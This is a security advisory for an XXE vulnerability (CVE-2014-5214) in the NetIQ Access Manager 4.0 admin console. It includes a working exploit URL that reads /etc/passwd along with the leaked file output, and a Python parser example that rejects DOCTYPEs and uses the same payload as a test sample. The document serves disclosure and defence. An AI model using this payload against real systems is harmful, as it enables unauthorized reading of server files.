XML eXternal Entity Injection (XXE) vulnerability: Authenticated administrative users can download arbitrary files from the Access Manager administration interface as the user "novlwww" (CVE-2014-5214)

  • 7015993
  • 15-Dec-2014
  • 17-Dec-2014

Environment

NetIQ Access Manager 4.0
NetIQ Access Manager 4.0 Support Pack 1 HF2 applied
CVE-2014-5214

Situation

Access Manager 4.0 is set up and working fine: users can access protected resources behind the Access Gateway after having successfully authenticated against the Identity Server. However, it is possible to execute an XML eXternal Entity Injection (XXE; see https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing for more details) against the Access Manager Administration Console server running iManager.

As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user:

https://147.2.33.233:2443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=%3C!DOCTYPE+request+[%0A%3C!ENTITY+include+SYSTEM+%22/etc/passwd%22%3E%0A]%3E%3Cquery%3E%3Ccontainer%3E%26include%3b%3C/container%3E%3Csubclasses%3Efalse%3C/subclasses%3E%3C/query%3E

The resulting error message displays the contents of the file, including all user-specific information:

Error Error: Invalid advanced selection
Container not found: at:x:25:25:
Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
:
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ncashell:x:1000:100:ncashell:/home/ncashell:/bin/bash
novlwww:x:108:113:Novell System User:/var/opt/novell/novlwww:/bin/bash

CVE-2014-5214 has been created and assigned to this discovery.
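As an added illustration of the mitigation (example code, not part of this advisory or of the iManager code base), the parser below accepts the query document format used in the URL above while refusing any DOCTYPE, so no SYSTEM entity can ever be declared; it also disables external entity resolution as a second line of defence. The benign container DN is a constructed sample, and the XXE document is the advisory's own query parameter, URL-decoded.

```python
import urllib.parse
import xml.parsers.expat as expat


class XxeAttempt(ValueError):
    """Raised when a query document carries a DOCTYPE, i.e. could declare entities."""


def parse_query_safely(xml_text: str) -> dict:
    """Parse <query><container>..</container><subclasses>..</subclasses></query>
    into a dict. A DOCTYPE is refused outright (the legitimate document never has
    one), and external entity resolution is disabled as defence in depth."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    fields, open_elements = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise XxeAttempt(f"DOCTYPE '{name}' is not permitted in a query document")

    def external_entity_ref(context, base, sysid, pubid):
        return 0  # never fetch an external entity; returning 0 aborts the parse

    def start_element(name, attrs):
        open_elements.append(name)
        if name != "query":
            fields[name] = ""

    def character_data(data):  # text may arrive in several chunks, so append
        if open_elements and open_elements[-1] != "query":
            fields[open_elements[-1]] += data

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = character_data
    parser.EndElementHandler = lambda name: open_elements.pop()
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError as exc:
        raise ValueError(f"malformed query document: {exc}") from exc
    return fields


def is_xxe_attempt(xml_text: str) -> bool:
    """True when the document would be rejected specifically for carrying a DOCTYPE."""
    try:
        parse_query_safely(xml_text)
    except XxeAttempt:
        return True
    except ValueError:
        return False
    return False


# The advisory's query parameter, URL-decoded (same payload as the URL above).
XXE_QUERY = urllib.parse.unquote_plus(
    "%3C!DOCTYPE+request+[%0A%3C!ENTITY+include+SYSTEM+%22/etc/passwd%22%3E%0A]%3E"
    "%3Cquery%3E%3Ccontainer%3E%26include%3b%3C/container%3E%3Csubclasses%3Efalse"
    "%3C/subclasses%3E%3C/query%3E")
# A benign query of the same shape; the container DN is a constructed sample.
BENIGN_QUERY = "<query><container>ou=users,o=example</container><subclasses>false</subclasses></query>"
```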

Resolution

Apply Access Manager 4.0 Support Pack 1 Hot Fix 3 (4.0.1 HF3) or greater to address this issue.

Additional Information

NetIQ thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.